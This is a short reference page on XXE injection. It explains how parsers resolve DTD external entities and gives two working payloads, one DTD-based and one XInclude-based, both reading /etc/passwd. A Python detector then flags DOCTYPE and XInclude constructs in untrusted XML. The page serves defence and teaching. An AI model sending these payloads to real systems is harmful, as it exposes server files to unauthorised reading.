XXE (XML External Entity injection)

Description

This vulnerability lets an attacker attach a Document Type Definition (DTD) to XML that an application will parse. When the parser processes the document it also processes the DTD, so any external entity declared there (for example one pointing at a local file) is resolved and its contents substituted wherever the entity is referenced, which is how the payload takes effect. In practice the trickiest part is usually finding an input the application actually accepts and parses as XML.

Payloads

Inline DTD declaring an external entity, referenced from the document body:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE profile [
<!ELEMENT profile ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<profile>
  <users>
    <user>
      <firstname>&xxe;</firstname>
      <lastname>pass</lastname>
    </user>
  </users>
</profile>

XInclude variant, which needs no DTD at all and only the xi namespace declared on an enclosing element:

<?xml version="1.0" encoding="UTF-8" ?>
<profile xmlns:xi="http://www.w3.org/2001/XInclude">
  <users>
    <user>
      <firstname>
        <xi:include parse="text" href="file:///etc/passwd" />
      </firstname>
      <lastname>DOE</lastname>
    </user>
  </users>
</profile>
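On the receiving side, the practical check is to inspect untrusted XML for exactly the constructs these two payloads depend on before handing it to a full parser. The following is an added example (not code from the original page) using only Python's standard-library expat binding; it deliberately installs no external-entity handler, so the SYSTEM id in the DTD payload is recorded but never fetched, and it flags any XInclude element it sees. The three sample documents are constructed inline from the payloads above.

```python
import xml.parsers.expat

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"


def inspect_untrusted_xml(data: bytes) -> dict:
    """Parse with expat and record the constructs the payloads above rely on.
    No ExternalEntityRefHandler is installed, so expat skips &xxe; rather than
    fetching its SYSTEM id; the DTD is read only to see what it declares."""
    findings = {"doctype": None, "external_entities": [], "xinclude": []}
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings["doctype"] = name  # any DOCTYPE in untrusted input is suspect

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        if sysid is not None:  # SYSTEM/PUBLIC entity: points outside the document
            findings["external_entities"].append((name, sysid))

    def on_start_element(name, attrs):
        uri, _, local = name.rpartition(" ")  # expat reports "<uri> <local>"
        if uri == XINCLUDE_NS and local == "include":
            findings["xinclude"].append(attrs.get("href"))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.StartElementHandler = on_start_element
    parser.Parse(data, True)
    return findings


def is_safe_to_process(data: bytes) -> bool:
    """Policy for untrusted XML: no DOCTYPE at all and no XInclude elements."""
    f = inspect_untrusted_xml(data)
    return f["doctype"] is None and not f["xinclude"]


# Constructed samples: the two payloads from this page plus a benign profile.
DTD_PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE profile [ <!ELEMENT profile ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<profile><users><user><firstname>&xxe;</firstname><lastname>pass</lastname></user></users></profile>"""
XINCLUDE_PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<profile xmlns:xi="http://www.w3.org/2001/XInclude"><users><user><firstname>
<xi:include parse="text" href="file:///etc/passwd"/></firstname><lastname>DOE</lastname></user></users></profile>"""
BENIGN = b"<profile><users><user><firstname>John</firstname><lastname>DOE</lastname></user></users></profile>"

if __name__ == "__main__":
    for label, doc in (("dtd", DTD_PAYLOAD), ("xinclude", XINCLUDE_PAYLOAD), ("benign", BENIGN)):
        print(f"{label}: safe={is_safe_to_process(doc)} {inspect_untrusted_xml(doc)}")
```

Rejecting every DOCTYPE is the simplest robust policy; a parser that must accept DTDs should instead disable external entity resolution and external DTD loading in its own configuration.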
